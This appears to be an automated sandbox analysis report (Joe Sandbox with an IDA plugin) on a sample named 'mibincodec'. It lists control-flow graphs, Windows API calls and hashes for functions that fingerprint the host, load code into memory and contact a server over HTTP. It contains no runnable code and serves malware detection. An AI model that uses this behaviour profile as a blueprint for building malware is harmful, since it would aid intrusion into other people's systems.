                                                                  control_flow_graph 166 21f2c20-21f2c56 167 21f2c5a-21f2c5e 166->167 168 21f2c60-21f2c66 167->168 169 21f2c6c 168->169 170 21f2e75-21f2e7b 168->170 171 21f2dca-21f2dd1 169->171 172 21f2c72-21f2c78 169->172 173 21f2f94-21f2f9a 170->173 174 21f2e81 170->174 175 21f2dee-21f2e16 InternetOpenW 171->175 176 21f2dd3-21f2de9 call 21f3f20 call 21f3e80 171->176 179 21f2c7e 172->179 180 21f2d15-21f2d1b 172->180 177 21f2ffe-21f3003 173->177 178 21f2f9c-21f2fa2 173->178 181 21f2e87-21f2e8d 174->181 182 21f2f34-21f2f43 174->182 188 21f2e18-21f2e2e call 21f3f20 call 21f3e80 175->188 189 21f2e33-21f2e3e 175->189 176->175 177->168 184 21f2fa8-21f2faf 178->184 185 21f2e64-21f2e6a 178->185 190 21f2cee-21f2d07 call 21f29b0 179->190 191 21f2c80-21f2c86 179->191 192 21f2d1d-21f2d23 180->192 193 21f2d99-21f2da0 180->193 194 21f2e8f-21f2e95 181->194 195 21f2f03-21f2f0a 181->195 186 21f2f45-21f2f5b call 21f3f20 call 21f3e80 182->186 187 21f2f60-21f2f76 182->187 205 21f2fcc-21f2ff9 InternetConnectW 184->205 206 21f2fb1-21f2fc7 call 21f3f20 call 21f3e80 184->206 196 21f3032-21f303d 185->196 197 21f2e70 185->197 186->187 236 21f2f7c-21f2f84 187->236 237 21f2d0b-21f2d10 187->237 188->189 228 21f2e5b-21f2e61 189->228 229 21f2e40-21f2e56 call 21f3f20 call 21f3e80 189->229 190->237 199 21f2c8c-21f2c92 191->199 200 21f3008-21f300f 191->200 192->185 209 21f2d29-21f2d2b 192->209 201 21f2dbd-21f2dc5 InternetCloseHandle 193->201 202 21f2da2-21f2db8 call 21f3f20 call 21f3e80 193->202 194->185 203 21f2e97-21f2ead call 21f42f0 194->203 210 21f2f0c-21f2f22 call 21f3f20 call 21f3e80 195->210 211 21f2f27-21f2f2f 195->211 197->167 199->185 215 21f2c98-21f2c9a 199->215 225 21f302c 200->225 226 21f3011-21f3027 call 21f3f20 call 21f3e80 200->226 201->168 202->201 252 21f2eaf-21f2eb6 203->252 253 21f2ef9-21f2efe 203->253 205->168 206->205 223 21f2d3f 209->223 224 21f2d2d-21f2d3d call 21f34c0 209->224 210->211 211->168 233 21f2c9c-21f2ca2 215->233 
234 21f2ca4-21f2ca6 215->234 227 21f2d43-21f2d4a 223->227 224->227 225->196 226->225 244 21f2d4c-21f2d62 call 21f3f20 call 21f3e80 227->244 245 21f2d67-21f2d94 call 21f3460 227->245 228->185 229->228 249 21f2ca8-21f2caf 233->249 234->249 236->237 251 21f2f8a-21f2f8f 236->251 237->168 244->245 245->168 262 21f2ccc-21f2ce9 HttpSendRequestW 249->262 263 21f2cb1-21f2cc7 call 21f3f20 call 21f3e80 249->263 251->168 265 21f2eb8-21f2ece call 21f3f20 call 21f3e80 252->265 266 21f2ed3-21f2edf ObtainUserAgentString 252->266 253->168 262->167 263->262 265->266 274 21f2ef2-21f2ef4 call 21f4250 266->274 275 21f2ee1-21f2eee call 21f56a0 266->275 274->253 275->274
                                                                  APIs
                                                                  • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 021F2CD5
                                                                  • InternetCloseHandle.WININET(?), ref: 021F2DBE
                                                                  • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 021F2DFA
                                                                  • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 021F2EDB
                                                                  • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 021F2FE2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                                                  • String ID: W~o
                                                                  • API String ID: 1741791824-2218025126
                                                                  • Opcode ID: f0ca9d72312876411fa6dcca061dfb1c9d9ce1edaacaeec72916e4870767938b
                                                                  • Instruction ID: 11cec9c36dde1d2f44a607204b06067a43ad2406bc9b11de65fae899d120deda
                                                                  • Opcode Fuzzy Hash: f0ca9d72312876411fa6dcca061dfb1c9d9ce1edaacaeec72916e4870767938b
                                                                  • Instruction Fuzzy Hash: 55A1C4B2E843419FDBA4AB659C8072B76D6ABC4744F110569EF75DB390EB30DC418BC2

                                                                  Control-flow Graph

                                                                  control_flow_graph 290 21f30d0-21f30e6 291 21f30ea-21f30ef 290->291 292 21f30f0-21f30f5 291->292 293 21f31ac-21f31b1 292->293 294 21f30fb 292->294 295 21f3226-21f32b0 293->295 296 21f31b3-21f31b8 293->296 297 21f3198-21f319c 294->297 298 21f3101-21f3106 294->298 295->292 301 21f31ec-21f31f4 296->301 302 21f31ba-21f31bf 296->302 299 21f3303-21f330d 297->299 300 21f31a2-21f31a7 297->300 303 21f310c-21f3111 298->303 304 21f32b5-21f32bd 298->304 300->292 309 21f31f6-21f320e call 21f3f20 call 21f3e80 301->309 310 21f3214-21f3221 301->310 307 21f31d4-21f31d9 302->307 308 21f31c1-21f31cf 302->308 311 21f312e-21f3135 303->311 312 21f3113-21f3118 303->312 305 21f32bf-21f32d7 call 21f3f20 call 21f3e80 304->305 306 21f32dd-21f3300 304->306 305->306 306->299 307->292 316 21f31df-21f31e9 307->316 308->292 309->310 310->291 313 21f3137-21f314d call 21f3f20 call 21f3e80 311->313 314 21f3152-21f315d 311->314 312->307 318 21f311e-21f312c call 21f3d10 312->318 313->314 332 21f315f-21f3175 call 21f3f20 call 21f3e80 314->332 333 21f317a-21f3188 RtlAllocateHeap 314->333 318->291 332->333 333->299 337 21f318e-21f3193 333->337 337->291
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 021F3182
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &$B$S=$p^5w
                                                                  • API String ID: 1279760036-3144705412
                                                                  • Opcode ID: 437eb428603c2a3755aad44285a08f30e9105e7213a1e2f6941e12d76c8f3ecd
                                                                  • Instruction ID: c7efb321e7db2874c187539f99da600cb7420d609db72f27dabdb2a3b2b85b9a
                                                                  • Opcode Fuzzy Hash: 437eb428603c2a3755aad44285a08f30e9105e7213a1e2f6941e12d76c8f3ecd
                                                                  • Instruction Fuzzy Hash: 85510672B483819FCB98DE28949412FB7E6FBD0344F20485EF276C7250DB70D9868B92

                                                                  Control-flow Graph

                                                                  control_flow_graph 383 21f9c10-21f9c1e 384 21f9c20-21f9c25 383->384 385 21f9c2b 384->385 386 21f9cd3-21f9cd8 384->386 387 21f9cc9-21f9cce 385->387 388 21f9c31-21f9c36 385->388 389 21f9cde-21f9ce5 386->389 390 21f9c43-21f9c48 386->390 387->384 391 21f9c38-21f9c3d 388->391 392 21f9c56-21f9c66 388->392 394 21f9ce7-21f9cfd call 21f3f20 call 21f3e80 389->394 395 21f9d02-21f9d18 389->395 390->384 393 21f9c4a-21f9c55 390->393 391->390 396 21f9d1d-21f9d24 391->396 397 21f9c68-21f9c80 call 21f3f20 call 21f3e80 392->397 398 21f9c86-21f9c8e 392->398 394->395 395->384 400 21f9d26-21f9d3c call 21f3f20 call 21f3e80 396->400 401 21f9d41-21f9d65 lstrcmpiW 396->401 397->398 404 21f9cae-21f9cc4 GetCurrentProcess QueryFullProcessImageNameW 398->404 405 21f9c90-21f9ca8 call 21f3f20 call 21f3e80 398->405 400->401 404->384 405->404
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 021F9CBA
                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 021F9CBD
                                                                  • lstrcmpiW.KERNELBASE(?,?), ref: 021F9D4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                                                  • String ID: C$v$79V#
                                                                  • API String ID: 3605714105-434289715
                                                                  • Opcode ID: ee5835c1042dfa1da904ab84e1a4106f8cd1e31a0870c21599e390da410e6283
                                                                  • Instruction ID: cebd40fceb828ee445b3ed3fea2a1dc3483133382960dac653a7f3255579c28b
                                                                  • Opcode Fuzzy Hash: ee5835c1042dfa1da904ab84e1a4106f8cd1e31a0870c21599e390da410e6283
                                                                  • Instruction Fuzzy Hash: 56310572B802489FD7A4FB68A49077B22D6ABC0354F25086AE775CB280EB71CC44CF91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 021F5C1B
                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 021F5C8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Heap$AllocateFree
                                                                  • String ID: p^5w
                                                                  • API String ID: 2488874121-1074354707
                                                                  • Opcode ID: f998d841d3e53dae81e17e700950d0863be564b6bdba1154c4861be36005fba3
                                                                  • Instruction ID: a265711e7b0c301eb1bc13861c2a6f56bdf6898d8b694dd5552a827caccb8271
                                                                  • Opcode Fuzzy Hash: f998d841d3e53dae81e17e700950d0863be564b6bdba1154c4861be36005fba3
                                                                  • Instruction Fuzzy Hash: 65117F72F812027FD794AAB5689062B26DBABC0694B544878F736CB340EB60CC514BD1

                                                                  Control-flow Graph

                                                                  control_flow_graph 506 218002d-218009e call 2180456 * 6 519 21800a0-21800a2 506->519 520 21800a7-21800b0 506->520 521 218044e-2180455 519->521 520->519 522 21800b2-21800b6 520->522 522->519 523 21800b8-21800c2 522->523 524 21800e4-2180105 GetNativeSystemInfo 523->524 525 21800c4-21800c7 523->525 524->519 527 2180107-218012d VirtualAlloc 524->527 526 21800c9-21800cf 525->526 528 21800d1-21800d4 526->528 529 21800d6 526->529 530 218012f-2180133 527->530 531 2180162-218016c 527->531 534 21800d9-21800e2 528->534 529->534 535 2180135-2180138 530->535 532 218016e-2180173 531->532 533 21801a4-21801b5 531->533 536 2180177-218018a 532->536 537 2180234-2180240 533->537 538 21801b7-21801d1 533->538 534->524 534->526 539 218013a-2180142 535->539 540 2180153-2180155 535->540 541 2180199-218019e 536->541 542 218018c-2180193 536->542 543 21802f0-21802fa 537->543 544 2180246-218025d 537->544 559 2180222-218022e 538->559 560 21801d3 538->560 539->540 545 2180144-2180147 539->545 546 2180157-218015c 540->546 541->536 550 21801a0 541->550 542->542 547 2180195 542->547 548 2180300-2180307 543->548 549 21803b2-21803c7 call 21b27b0 543->549 544->543 551 2180263-2180273 544->551 553 2180149-218014c 545->553 554 218014e-2180151 545->554 546->535 555 218015e 546->555 547->541 556 2180309-2180312 548->556 581 21803c9-21803ce 549->581 550->533 557 21802d5-21802e6 551->557 558 2180275-2180279 551->558 553->540 553->554 554->546 555->531 563 2180318-2180333 556->563 564 21803a7-21803ac 556->564 557->551 561 21802ec 557->561 565 218027a-2180289 558->565 559->538 562 2180230 559->562 566 21801d7-21801db 560->566 561->543 562->537 568 218034d-218034f 563->568 569 2180335-2180337 563->569 564->549 564->556 570 218028b-218028f 565->570 571 2180291-218029a 565->571 572 21801fb-2180204 566->572 573 21801dd 566->573 578 2180368-218036a 568->578 579 2180351-2180353 568->579 574 2180339-218033e 569->574 575 2180340-2180343 569->575 
570->571 576 218029c-21802a1 570->576 577 21802c3-21802c7 571->577 584 2180207-218021c 572->584 573->572 580 21801df-21801f9 573->580 588 2180345-218034b 574->588 575->588 589 21802a3-21802b2 576->589 590 21802b4-21802b7 576->590 577->565 585 21802c9-21802d1 577->585 586 218036c 578->586 587 2180371-2180376 578->587 591 2180359-218035b 579->591 592 2180355-2180357 579->592 580->584 582 218044c 581->582 583 21803d0-21803d4 581->583 582->521 583->582 594 21803d6-21803e0 583->594 584->566 595 218021e 584->595 585->557 596 218036e-218036f 586->596 597 2180379-2180380 587->597 588->597 589->577 590->577 598 21802b9-21802bf 590->598 591->578 593 218035d-218035f 591->593 592->596 593->597 599 2180361-2180366 593->599 594->582 600 21803e2-21803e6 594->600 595->559 596->597 601 2180388-218039d VirtualProtect 597->601 602 2180382 597->602 598->577 599->597 600->582 603 21803e8-21803f9 600->603 601->519 604 21803a3 601->604 602->601 603->582 605 21803fb-2180400 603->605 604->564 606 2180402-218040f 605->606 606->606 607 2180411-2180415 606->607 608 218042d-2180433 607->608 609 2180417-2180429 607->609 608->582 611 2180435-218044b 608->611 609->605 610 218042b 609->610 610->582 611->582
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02180005), ref: 021800E9
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02180005), ref: 02180111
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_2180000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 2032221330-0
                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction ID: c843fc4d28b37ed538c78f628ef067e7ef00afac4c7e7d8a4bf5ab4dcc212224
                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction Fuzzy Hash: ABD1AE71A8870A8FD714EF69C8C076AB3E1FF88318F18452DE8959B241E774E859CF91

                                                                  Control-flow Graph

                                                                  control_flow_graph 709 21f99a0-21f99b6 710 21f99c0-21f99c5 709->710 711 21f9b2f-21f9b34 710->711 712 21f99cb 710->712 715 21f9b3a-21f9b3f 711->715 716 21f9bd0-21f9bd7 711->716 713 21f9ac3-21f9aca 712->713 714 21f99d1-21f99d6 712->714 721 21f9acc-21f9ae2 call 21f3f20 call 21f3e80 713->721 722 21f9ae7-21f9afc 713->722 719 21f99dc-21f99e1 714->719 720 21f9a68-21f9a7f 714->720 723 21f9bb8-21f9bbd 715->723 724 21f9b41-21f9b48 715->724 717 21f9bd9-21f9bef call 21f3f20 call 21f3e80 716->717 718 21f9bf4 716->718 717->718 738 21f9bf7-21f9c01 718->738 726 21f99f5-21f99fc call 21f9c10 719->726 727 21f99e3-21f99e8 719->727 732 21f9a9c-21f9aad 720->732 733 21f9a81-21f9a97 call 21f3f20 call 21f3e80 720->733 721->722 744 21f9afe-21f9b14 call 21f3f20 call 21f3e80 722->744 745 21f9b19-21f9b2a 722->745 723->710 731 21f9bc3-21f9bcd 723->731 729 21f9b4a-21f9b60 call 21f3f20 call 21f3e80 724->729 730 21f9b65-21f9b72 FindFirstChangeNotificationW call 21f9c10 724->730 758 21f99fe-21f9a06 726->758 759 21f9a37-21f9a3e 726->759 727->723 739 21f99ee-21f99f3 727->739 729->730 747 21f9b77-21f9b79 730->747 732->738 757 21f9ab3-21f9abe 732->757 733->732 739->710 744->745 745->710 755 21f9b7f-21f9b86 747->755 756 21f9a5e-21f9a63 747->756 765 21f9b88-21f9b9e call 21f3f20 call 21f3e80 755->765 766 21f9ba3-21f9bb3 755->766 756->710 757->710 770 21f9a08-21f9a20 call 21f3f20 call 21f3e80 758->770 771 21f9a26-21f9a35 758->771 767 21f9a5b 759->767 768 21f9a40-21f9a56 call 21f3f20 call 21f3e80 759->768 765->766 766->710 767->756 768->767 770->771 771->710
                                                                  APIs
                                                                  • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 021F9B6E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ChangeFindFirstNotification
                                                                  • String ID: +Y6t
                                                                  • API String ID: 1065410024-3949905484
                                                                  • Opcode ID: 63ded62093aca15ba790b883cc805a748aae774445130bfa27a0770861c215c0
                                                                  • Instruction ID: 439164742fb5fc3b837fc3b356d269e1c39bbac694c00e5ea9cf0366e8157a0f
                                                                  • Opcode Fuzzy Hash: 63ded62093aca15ba790b883cc805a748aae774445130bfa27a0770861c215c0
                                                                  • Instruction Fuzzy Hash: 6C516374B802419FDBA8FB65A890B7F32D66B84344B15485EFB75CB280EB70C9518B92

                                                                  Control-flow Graph

                                                                  control_flow_graph 788 21f9d70-21f9d7c 789 21f9d80-21f9d85 788->789 790 21f9de7-21f9dee 789->790 791 21f9d87-21f9d8c 789->791 794 21f9e0b-21f9e16 790->794 795 21f9df0-21f9e06 call 21f3f20 call 21f3e80 790->795 792 21f9d8e-21f9d93 791->792 793 21f9da9-21f9db0 791->793 797 21f9d99-21f9d9e 792->797 798 21f9e50-21f9e57 792->798 799 21f9dcd-21f9de5 793->799 800 21f9db2-21f9dc8 call 21f3f20 call 21f3e80 793->800 810 21f9e18-21f9e2e call 21f3f20 call 21f3e80 794->810 811 21f9e33-21f9e44 794->811 795->794 797->789 804 21f9da0-21f9da8 797->804 802 21f9e59-21f9e6f call 21f3f20 call 21f3e80 798->802 803 21f9e74-21f9e8b CreateThread 798->803 799->789 800->799 802->803 809 21f9e8e-21f9e96 803->809 810->811 811->809 824 21f9e46-21f9e4b 811->824 824->789
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,021F99A0,00000000,00000000,00000000), ref: 021F9E83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID: p^5w
                                                                  • API String ID: 2422867632-1074354707
                                                                  • Opcode ID: a38138dbb4b17f40e6f6528759be6b83f1cb7f04227724e74754ccf247a50969
                                                                  • Instruction ID: 1addb316279465dd207ef45ce32087bc5c2f8c38959e7dbb1eadac55df1cd9fc
                                                                  • Opcode Fuzzy Hash: a38138dbb4b17f40e6f6528759be6b83f1cb7f04227724e74754ccf247a50969
                                                                  • Instruction Fuzzy Hash: 7E215E31BC12416BEBE4AA75A951B3A22D3AB80744F24485DE736CF2C1FB61D8518B86

                                                                  Control-flow Graph

                                                                  control_flow_graph 826 21f5360-21f536e 827 21f5370-21f5375 826->827 828 21f537b 827->828 829 21f5421-21f5426 827->829 830 21f540d-21f541c 828->830 831 21f5381-21f5386 828->831 832 21f5428-21f542d 829->832 833 21f5466-21f547b 829->833 830->827 834 21f538c-21f5391 831->834 835 21f5480-21f548e 831->835 836 21f542f-21f5434 832->836 837 21f545c-21f5461 832->837 833->827 840 21f53d8-21f53df 834->840 841 21f5393-21f5398 834->841 838 21f5447-21f544c 836->838 839 21f5436-21f5442 836->839 837->827 838->827 842 21f5452-21f545b 838->842 839->827 843 21f53fc-21f5408 GetNativeSystemInfo 840->843 844 21f53e1-21f53f7 call 21f3f20 call 21f3e80 840->844 841->838 845 21f539e-21f53ad 841->845 843->827 844->843 847 21f53af-21f53c5 call 21f3f20 call 21f3e80 845->847 848 21f53ca-21f53d6 845->848 847->848 848->827
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 021F5401
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: Ei
                                                                  • API String ID: 1721193555-3988083245
                                                                  • Opcode ID: 2b79accd1d5cd339f61f6048b750433f64ede1cad25719f14cf14755a0cf9615
                                                                  • Instruction ID: b0a3e23f95728da6301c680fe57a2eb477887c73effab68121756fe7090766fe
                                                                  • Opcode Fuzzy Hash: 2b79accd1d5cd339f61f6048b750433f64ede1cad25719f14cf14755a0cf9615
                                                                  • Instruction Fuzzy Hash: 04213D71E84250A7C6E48A6CA4C427F79D35794388FD4092AE779DB350FB64C9408B82

                                                                  Control-flow Graph

                                                                  control_flow_graph 857 21f5490-21f54a4 858 21f54a6-21f54bc call 21f3f20 call 21f3e80 857->858 859 21f54c1-21f54cf 857->859 858->859 864 21f5533-21f553c 859->864 865 21f54d1-21f54db 859->865 866 21f54dd 865->866 867 21f54f7-21f54fe 865->867 869 21f54e0-21f54e4 866->869 870 21f551b-21f5531 GetVolumeInformationW 867->870 871 21f5500-21f5516 call 21f3f20 call 21f3e80 867->871 872 21f54e6-21f54ed 869->872 873 21f54f1-21f54f3 869->873 870->864 871->870 872->869 875 21f54ef 872->875 873->867 875->867
                                                                  APIs
                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 021F5531
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InformationVolume
                                                                  • String ID: P4#v
                                                                  • API String ID: 2039140958-3471064730
                                                                  • Opcode ID: 2203e711a9237f014466ee8a29539de26a7dc0a411d9fb45e2dddc3b3f5e65f2
                                                                  • Instruction ID: 9fa8f3bd7f7788722e7d8611c4d81a0dc13356b0fcb73aa9b4d781b59fcd9501
                                                                  • Opcode Fuzzy Hash: 2203e711a9237f014466ee8a29539de26a7dc0a411d9fb45e2dddc3b3f5e65f2
                                                                  • Instruction Fuzzy Hash: DC113070A84300ABE794EB64D855B6676E2AB80704F94881CE7758B1D0FB74D945CB52

                                                                  Control-flow Graph
                                                                  (graph image not reproduced; blocks 21f42f0-21f4348, with calls to 21f3f20 and 21f3e80 and an RtlAllocateHeap call in block 21f4340-21f4348)
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 021F4344
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: p^5w
                                                                  • API String ID: 1279760036-1074354707
                                                                  • Opcode ID: c88f70897a9388bc77e16b17d5723b0861244cb8dc6722596ee6057040e77e96
                                                                  • Instruction ID: b0908abe1a9c2d8a2416baebad0865fbe4d4a124f135d4ae311b14b4f63af7ec
                                                                  • Opcode Fuzzy Hash: c88f70897a9388bc77e16b17d5723b0861244cb8dc6722596ee6057040e77e96
                                                                  • Instruction Fuzzy Hash: 7EE03966B812116EDBD4A7B5B854A7F22EBABC06803158869F732CB344FF608C414BD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90c9098b3b1810c4423cb8c37353cda5e5a2631d078fdfc78f2f65b35950e462
                                                                  • Instruction ID: 52f98e4d7ff986962f88fae1e542cdfbc5c8abbadffb4e660ff7225fe0376974
